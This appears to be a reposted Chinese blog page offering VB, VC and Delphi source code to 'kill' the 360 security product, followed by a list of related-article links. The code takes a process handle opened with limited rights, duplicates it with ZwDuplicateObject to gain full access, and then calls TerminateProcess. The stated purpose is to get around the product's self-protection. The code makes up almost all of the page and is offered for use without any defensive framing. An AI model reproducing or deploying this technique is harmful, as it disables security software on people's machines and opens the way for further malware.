干掉360保险箱VB/VC/delphi 源码

本文整理自网络，侵删。

  
干掉360保险箱VB/VC/delphi 源码
VB 源码：
Option Explicit 
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long 
Private Declare Function ZwDuplicateObject _ 
               Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _ 
                           ByVal SourceHandle As Long, _ 
                           ByVal TargetProcessHandle As Long, _ 
                           ByRef TargetHandle As Long, _ 
                           ByVal DesiredAccess As Long, _ 
                           ByVal HandleAttributes As Long, _ 
                           ByVal Options As Long) As Long 
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long 
Function FcOpenProcess&(p&) 
Dim ProcessHandle As Long 
Dim Rtn As Long 
ProcessHandle = OpenProcess(&H400, 0, p) 
If ProcessHandle <> 0 Then 
      Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1) 
      FcOpenProcess = ProcessHandle 
End If 
End Function 
Private Sub Command1_Click() 
Dim ProcessHandle As Long 
ProcessHandle = FcOpenProcess&(1884) 
TerminateProcess ProcessHandle, 0 
End Sub 
/////////////////////// VC 源码
void KillProcess (ULONG dwProcessId) 
{ 
   HMODULE hNTDLL = GetModuleHandle("ntdll.dll"); 
   HANDLE hProcessHandle; 
      
   _ZwDuplicateObject ZwDuplicateObject = 
         (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject"); 
   //打开进程权限要为0x400 
   hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId); 
   if(hProcessHandle != NULL) 
   { 
         //复制句柄 
         ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1); 
   } 
   TerminateProcess(hProcessHandle, 0); 
} 
////////////////////////////////////// 
既然VB VC 都有了 也就不差 delphi的了 
///////////////////// 
附上D源码 
///////////////////// 
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’; 
Function FcOpenProcess(p:Longint):Longint; 
var 
Rtn,ProcessHandle:Longint; 
begin 
ProcessHandle := OpenProcess($400, False, p); 
result:=0; 
If ProcessHandle <> 0 Then 
begin 
      Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1); 
      result := ProcessHandle 
End; 
End; 
procedure TForm1.Button1Click(Sender: TObject); 
var 
ProcessHandle :Longint; 
begin 
ProcessHandle := FcOpenProcess(3440); 
TerminateProcess( ProcessHandle, 0 ); 
end;
 

相关阅读 >>

Delphi 执行cmd并取得返回值

Delphi winapi: flashwindow - 闪烁窗口

ttreeview的两个事件ondragdrop、ondragover 实现自动拖放功能

Delphi gettickcount获取电脑开机时间

Delphi xe6 android 实现base64字符串的解析

Delphi 枚举resource资源名

Delphi richedit 的scrollbar自动向下滚动

Delphi 的内存操作函数(1): 给字符指针分配内存

Delphi 实现拦截api的钩子(hook)

Delphi 窗体内控件实现滚动字母

更多相关阅读请进入《Delphi》频道 >>

转载请注明出处：木庄网络博客 » 干掉360保险箱VB/VC/delphi 源码